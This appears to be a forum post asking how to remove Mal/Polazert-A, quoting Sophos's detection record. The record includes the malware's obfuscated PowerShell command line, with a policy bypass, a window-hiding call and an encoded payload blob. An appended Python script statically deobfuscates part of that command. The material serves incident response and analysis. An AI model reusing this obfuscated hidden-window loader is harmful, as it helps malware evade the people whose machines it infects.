
Mal/Polazert-A Removal?

I have two endpoints at two totally unrelated clients where Sophos detected Mal/Polazert-A. Sophos is good at telling me about it, but it doesn't give me any options to remove it. Every time the client reboots their computer, they get a popup from Sophos after login that Sophos found this malware. Now I am concerned it is still running somehow and our client wants to know why we aren't removing malware from their computer.

I explain that Sophos detected and terminated it, but like me, they want to know why it is still there.

How do I remove it?

Details of the infection from Sophos Central:

Path:
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Name:
powershell.exe
Command line:
"PowerShell.exe" -EP byPAss -cOmMAnD "$a754ea6e8b041aa5b575492443c23=AdD-TypE -memBERDEfINITIon ('['+'d'.tOuppER()+'lL'.tolower()+'i'.Toupper()+'MpOrT('.toLOWeR()+[CHAr]0X22+'user32.DLl'.TOLoWer()+[CHar]0x22+')]PuBLIC sTATic extern BOol '.ToLOwEr()+'s'.tOupPEr()+'hOw'.ToLOWer()+'w'.TOupper()+'IndOw'.TOLoWeR()+'a'.TOupPEr()+'SYnc('.ToLower()+'i'.toUPper()+'nT'.tOLoweR()+'p'.tOUPper()+'Tr hwND, iNT NcmDSHow);'.toLOWER()) -naME ('W'.tOupPeR()+'iN32'.toLOweR()+'s'.TOUppEr()+'HoW'.TOLOwEr()+'w'.toUppeR()+'INDOW'.TOlOWeR()+'a'.tOUPPEr()+'SyNc'.TOlOWeR()) -nameSpacE WiN32FUNCTioNs -PAssThru;$a754ea6e8b041aa5b575492443c23::shoWWInDOWASYnc((gET-PROcess -id $Pid).mAiNWiNdOWHANdLE, 0);$a42b0d88df94e2b6b9453ae110cca='QHwmS1BAUnFIdEB3dChiQFZBPHJAVFEpel5uOzwzXk9+OGFeUTUrXkBSX0hGQHdKTXJeUjx6VEBWU0okQHFuJERAcW0pUUBSXyFvQHNfckxeTkYmTV5uJDZOQH04Tm9Ae1lIZV5NISlDXk07UiZeTyV5WkB7aFp4QHwmTmJeUnZDSUB1aVpLXlBHWl5AUzJCI15QckJiQH5NbyFAYHttJkB9aXVhXlBRZlVAUzQ0WEB0TTRuQHcxUFJeT3c3IV5ucm5pXlByVzhAeytXVEB2NWwwPCVeczB1I20wdGZ0I3g=';$a1bfc0
Process ID:
8456
Process executed by:
<domain>\Admin1
SHA256:
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
Start time:
Feb 9, 2022 7:51 PM
End time:
Feb 9, 2022 7:51 PM
Duration:
7s 69ms
Actions done to this artifact:
None
Actions performed by this artifact:
162 File reads
122 Registry value sets
19 File writes
9 File deletions
2 File renames
-Mike
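For anyone who wants to know what that Add-Type call in the quoted command line actually defines without running it, here is an added Python example (not from the original post, and not Sophos tooling). It evaluates the case-mangled `'x'.ToUpper()+'y'.ToLower()+[char]0x22` concatenation statically; it assumes only the three term shapes that appear in the quoted line (a quoted literal, a literal with .ToUpper()/.ToLower(), and a [char] cast) and the Add-Type statement is copied from the post.

```python
import re

# The Add-Type statement from the command line quoted above, copied verbatim (split into pieces for line length only).
ADD_TYPE_STMT = (
    "AdD-TypE -memBERDEfINITIon ('['+'d'.tOuppER()+'lL'.tolower()+'i'.Toupper()+'MpOrT('.toLOWeR()"
    "+[CHAr]0X22+'user32.DLl'.TOLoWer()+[CHar]0x22+')]PuBLIC sTATic extern BOol '.ToLOwEr()"
    "+'s'.tOupPEr()+'hOw'.ToLOWer()+'w'.TOupper()+'IndOw'.TOLoWeR()+'a'.TOupPEr()+'SYnc('.ToLower()"
    "+'i'.toUPper()+'nT'.tOLoweR()+'p'.tOUPper()+'Tr hwND, iNT NcmDSHow);'.toLOWER()) -naME ('W'.tOupPeR()"
    "+'iN32'.toLOweR()+'s'.TOUppEr()+'HoW'.TOLOwEr()+'w'.toUppeR()+'INDOW'.TOlOWeR()+'a'.tOUPPEr()"
    "+'SyNc'.TOlOWeR()) -nameSpacE WiN32FUNCTioNs -PAssThru"
)

# One '+'-separated term: 'literal' with optional .ToUpper()/.ToLower(), or a [char] cast (PowerShell is case-insensitive).
TERM = re.compile(
    r"\s*(?:'(?P<lit>[^']*)'(?:\.(?P<meth>to(?:upper|lower))\(\))?"
    r"|\[char\](?P<code>0x[0-9a-f]+|[0-9]+))\s*(?:\+|$)", re.IGNORECASE)

def parenthesized_arg(stmt: str, param: str) -> str:
    """Return the (...) expression after a parameter; quote-aware so '(' inside a literal does not unbalance it."""
    m = re.search(re.escape(param) + r"\s*\(", stmt, re.IGNORECASE)
    if not m:
        raise ValueError(f"parameter {param} not found")
    depth, in_quote = 1, False
    for i in range(m.end(), len(stmt)):
        c = stmt[i]
        if c == "'":
            in_quote = not in_quote
        elif not in_quote:
            depth += (c == "(") - (c == ")")
            if depth == 0:
                return stmt[m.end():i]
    raise ValueError("unbalanced parentheses")

def deobfuscate(expr: str) -> str:
    """Evaluate the case-mangled concatenation term by term without executing any PowerShell."""
    out, pos = [], 0
    while pos < len(expr):
        m = TERM.match(expr, pos)
        if not m:
            raise ValueError(f"unsupported syntax at offset {pos}: {expr[pos:pos + 20]!r}")
        if m.group("code") is not None:
            out.append(chr(int(m.group("code"), 0)))
        else:
            lit, meth = m.group("lit"), (m.group("meth") or "").lower()
            out.append(lit.upper() if meth == "toupper" else lit.lower() if meth == "tolower" else lit)
        pos = m.end()
    return "".join(out)

def resolve_add_type(stmt: str = ADD_TYPE_STMT) -> dict:
    return {p: deobfuscate(parenthesized_arg(stmt, "-" + p)) for p in ("Name", "MemberDefinition")}
```

The recovered definition is a P/Invoke of user32.dll ShowWindowAsync under the type name Win32ShowWindowAsync, which the quoted command then calls on its own main window handle with 0 (SW_HIDE), so the PowerShell window is hidden from the logged-on user each time it runs.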

